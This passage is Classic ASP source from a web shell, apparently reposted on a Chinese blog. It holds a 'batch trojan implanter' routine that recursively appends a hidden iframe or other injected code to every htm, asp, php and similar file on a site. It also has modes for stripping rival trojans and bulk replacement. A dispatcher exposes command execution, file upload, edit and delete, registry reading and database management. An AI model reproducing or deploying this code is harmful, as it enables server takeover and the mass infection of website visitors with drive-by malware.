set f=fs.getfile(str2)
set f_addcode=f.openastextstream(8,-2)
if left(right(str2,8),4)="conn" then
f_addcode.write
else
f_addcode.write addcode
f_addcode.close
set f=nothing
end if
end if
set fs=nothing
end sub
err.clear
case "cplgm"
fpath=request("fd")
addcode = request("code")
addcode2 = request("code2")
pcfile=request("pcfile")
checkbox=request("checkbox")
showmsg=request("showmsg")
ftype=request("ftype")
m=request("m")
if ftype="" then
ftype="txt|htm|html|asp|php|jsp|aspx|cgi|cer|asa|cdx"
if fpath="\" then fpath=server.mappath("\")
if fpath="." or fpath="" then fpath=server.mappath("/")
if addcode="" then addcode="<iframe src=http://127.0.0.1/m.htm
width=0 height=0></iframe>"
if checkbox="" then checkbox=request("checkbox")
if pcfile="" then
pcfilename=request.servervariables("script_name")
pcfilek=split(pcfilename,"/")
pcfilen=ubound(pcfilek)
pcfile=pcfilek(pcfilen)
end if
rrs ("<b>网站根目录</b>- "&server.mappath("/")&"<br>")
rrs ("<b>本程序目录</b>- "&server.mappath("."))
rrs "<form method=post><div style='color:#3399ff'><b>["
if m="1" then rrs"批量挂马器-批量挂马"
if m="2" then rrs"批量清马器-清除别人的网马"
if m="3" then rrs"批量替换器-文件替换修改工具"
if m="" then response.end
rrs "]</b></div><table width=100% border=0><tr><td>文件路径:
</td>"
rrs "<td><input type=text name=fd value=""\"" size=40> 填“\”
即网站根目录;“.”为程序所在目录</td></tr>"
if m="1" then rrs "<tr><td>过滤重复:</td><td><input class=c
name='checkbox' checked='checked' type=checkbox value=""checked""
"&checkbox&"> 防止一个页面中有多个重复的代码</td></tr>"
rrs "<tr><td>排除文件:</td>"
rrs "<td><input name='pcfile' type=text id='pcfile'
value='"&pcfile&"' size=40> 输入不想被修改的文件名,例如:
1.asp|2.asp|3.asp</td></tr>"
rrs "<tr><td>文件类型:</td>"
rrs "<td><input name='ftype' type=text id='ftype'
value='"&ftype&"' size=40> 输入要修改的文件类型[扩展名],例如:
htm|html|asp|php|jsp|aspx|cgi</td></tr><tr><td><font color=#3399ff>"
if m="1" then rrs"要挂的马:"
if m="2" then rrs"要清的马:"
if m="3" then rrs"查找内容:"
rrs"</font></td><td><textarea name=code cols=66
rows=3>"&addcode&"</textarea></td></tr>"
if m="3" then rrs "<tr><td><font color=#3399ff>替 换 为:
</font></td><td><textarea name=code2 cols=66
rows=3>"&addcode&"</textarea></td></tr>"
rrs "<tr><td></td><td> <input name=submit type=submit value=开
始执行> --标记解释--[成功:√ , 排除:× , 重复:<font color=red>×
</font>]</td></tr>"
rrs "</table></form>"
if request("submit")="开始执行" then
rrs"<div style='line-height:25px'><b>执行记录:</b><br>"
call insertallfiles(fpath,addcode,pcfile)
rrs"</div>"
end if
sub insertallfiles(wpath,wcode,pc)
server.scripttimeout=999999999
if right(wpath,1)<>"\" then wpath=wpath &"\"
set wfso = createobject("scripting.filesystemobject")
on error resume next
set f = wfso.getfolder(wpath)
set fc2 = f.files
for each myfile in fc2
set fs1 = createobject("scripting.filesystemobject")
ftype1=split(myfile.name,".")
ftype2=ubound(ftype1)
if ftype2>0 then
ftype3=lcase(ftype1(ftype2))
else
ftype3="无"
end if
if instr(lcase(pc),lcase(myfile.name))=0 and instr
(lcase(ftype),ftype3)<>0 then
select case m
case "1"
if checkbox<>"checked" then
set
tfile=fs1.opentextfile(wpath&""&myfile.name,8,-2)
if left(myfile.name,4)="conn"
then
tfile.write
rrs"√
"&wpath&myfile.name
else
tfile.writeline wcode
rrs"√
"&wpath&myfile.name
tfile.close
end if
end if
if checkbox="checked" then
set
tfile1=fs1.opentextfile(wpath&""&myfile.name,1,-2)
if instr
(tfile1.readall,wcode)=0 then
set
tfile=fs1.opentextfile(wpath&""&myfile.name,8,-2)
if left(myfile.name,4)
="conn" then
tfile.write
rrs"×
"&wpath&myfile.name
else
tfile.writeline wcode
rrs"√
"&wpath&myfile.name
tfile1.close
end if
else
rrs"<font
color=red>×</font> "&wpath&myfile.name
tfile1.close
end if
set tfile1=nothing
end if
case "2"
set tfile1=fs1.opentextfile
(wpath&""&myfile.name,1,-2)
newcode=replace
(tfile1.readall,wcode,"")
set
objcountfile=wfso.createtextfile(wpath&myfile.name,true)
objcountfile.write newcode
objcountfile.close
rrs"√ "&wpath&myfile.name
set objcountfile=nothing
case "3"
set tfile1=fs1.opentextfile
(wpath&""&myfile.name,1,-2)
newcode=replace
(tfile1.readall,wcode,addcode2)
set
objcountfile=wfso.createtextfile(wpath&myfile.name,true)
objcountfile.write newcode
objcountfile.close
rrs"√ "&wpath&myfile.name
set objcountfile=nothing
case else
rrs"大哥,别乱来.":response.end
end select
else
rrs"× "&wpath&myfile.name
end if
rrs " → <a href='javascript:fullform("""&replace
(wpath&myfile.name,"\","\\")&""",""downfile"")' class='am' title='下
载'>下载</a> "
rrs "<a href='javascript:fullform("""&replace
(wpath&myfile.name,"\","\\")&""",""editfile"")' class='am' title='编
辑'>编辑</a> "
rrs "<a href='javascript:fullform("""&replace(str1,"\","\\")
&""",""delfile"")' onclick='return yesok()' class='am' title='删除'>删
除</a> "
rrs "<a href='javascript:fullform("""&replace
(wpath&myfile.name,"\","\\")&""",""copyfile"")' class='am' title='复
制'>复制</a> "
rrs "<a href='javascript:fullform("""&replace
(wpath&myfile.name,"\","\\")&""",""movefile"")' class='am' title='移
动'>移动</a><br>"
next
set fsubfolers = f.subfolders
for each f1 in fsubfolers
newpath=wpath&""&f1.name
insertallfiles newpath,wcode,pc
next
set tfile=nothing
set fso = nothing
set tfile=nothing
set tfile2=nothing
set wfso = nothing
end sub
case "readreg":call readreg()
case "show1file":set abc=new lbf:abc.show1file(session
("folderpath")):set abc=nothing
case "downfile":downfile fname:showerr()
case "delfile":set abc=new lbf:abc.delfile(fname):set abc=nothing
case "editfile":set abc=new lbf:abc.editfile(fname):set abc=nothing
case "copyfile":set abc=new lbf:abc.copyfile(fname):set abc=nothing
case "movefile":set abc=new lbf:abc.movefile(fname):set abc=nothing
case "delfolder":set abc=new lbf:abc.delfolder(fname):set abc=nothing
case "copyfolder":set abc=new lbf:abc.copyfolder(fname):set
abc=nothing
case "movefolder":set abc=new lbf:abc.movefolder(fname):set
abc=nothing
case "newfolder":set abc=new lbf:abc.newfolder(fname):set abc=nothing
case "upfile":upfile()
case "cmd1shell":cmd1shell()
case "logout":session.contents.remove("web2a2dmin"):response.redirect
url
case "dbmanager":dbmanager()
case "course":course()
case "serverinfo":serverinfo()
case else mainform()
end select
if action<>"servu" then showerr()
rrs"</body></html>"
%>
上一篇: yum指令常用参数说明
下一篇: IOS开发(44)之内存警告